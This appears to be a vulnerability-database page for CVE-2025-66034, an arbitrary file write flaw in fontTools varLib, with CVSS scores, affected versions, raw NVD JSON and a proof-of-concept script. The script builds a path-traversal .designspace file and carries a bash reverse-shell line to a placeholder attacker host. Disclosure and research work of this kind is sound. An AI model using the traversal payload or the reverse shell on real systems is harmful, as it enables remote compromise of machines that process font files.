Security Vulnerability Report
中文
CVE-2025-66034 CVSS 6.3 MEDIUM

CVE-2025-66034

Published: 2025-11-29 01:16:03
Last Modified: 2025-12-03 21:50:20
Source: [email protected]

Description

fontTools is a library for manipulating fonts, written in Python. In versions from 4.33.0 to before 4.60.2, the fonttools varLib (or python3 -m fontTools.varLib) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the main() code path of fontTools.varLib, used by the fonttools varLib CLI and any code that invokes fontTools.varLib.main(). This issue has been patched in version 4.60.2.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:fonttools:fonttools:*:*:*:*:*:python:*:* - VULNERABLE
fontTools >= 4.33.0
fontTools < 4.60.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-66034 PoC - fontTools varLib Arbitrary File Write Note: This PoC is for educational and security research purposes only. Do not use for unauthorized testing or exploitation. """ import os import base64 # Create malicious .designspace file with path traversal malicious_designspace = """<?xml version="1.0" encoding="utf-8"?> <designspace format="1.0"> <axes> <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/> </axes> <sources> <source filename="../../../../../../../../../tmp/malicious.sh" familyname="Test"/> </sources> <instances> <instance familyname="Test" stylename="Regular"> <location> <dimension name="weight" value="400"/> </location> <glyph name="space" /> </instance> </instances> </designspace> """ # Create the malicious payload that will be written malicious_payload = """#!/bin/bash # Reverse shell or any malicious code # This file would be written to arbitrary location via path traversal /bin/bash -i >& /dev/tcp/attacker-ip/4444 0>&1 """ def generate_poc(): """Generate PoC files for testing in controlled environment""" print("CVE-2025-66034 PoC Generator") print("=" * 50) print("\nThis vulnerability allows arbitrary file write via") print("crafted .designspace files with path traversal.") print("\nGenerated files:") print("1. malicious.designspace - Malicious designspace file") print("2. malicious.sh - Payload to be written") print("\nUsage:") print("python3 -m fontTools.varLib malicious.designspace") print("\nNote: Test only in isolated environment!") return { 'designspace': malicious_designspace, 'payload': malicious_payload } if __name__ == "__main__": generate_poc()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66034", "sourceIdentifier": "[email protected]", "published": "2025-11-29T01:16:02.967", "lastModified": "2025-12-03T21:50:20.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "fontTools is a library for manipulating fonts, written in Python. In versions from 4.33.0 to before 4.60.2, the fonttools varLib (or python3 -m fontTools.varLib) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the main() code path of fontTools.varLib, used by the fonttools varLib CLI and any code that invokes fontTools.varLib.main(). This issue has been patched in version 4.60.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-91"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fonttools:fonttools:*:*:*:*:*:python:*:*", "versionStartIncluding": "4.33.0", "versionEndExcluding": "4.60.2", "matchCriteriaId": "76CBDF6D-E062-4632-8E9B-027EC11860C7"}]}]}], "references": [{"url": "https://github.com/fonttools/fonttools/commit/a696d5ba93270d5954f98e7cab5ddca8a02c1e32", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-768j-98cg-p3fv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-768j-98cg-p3fv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.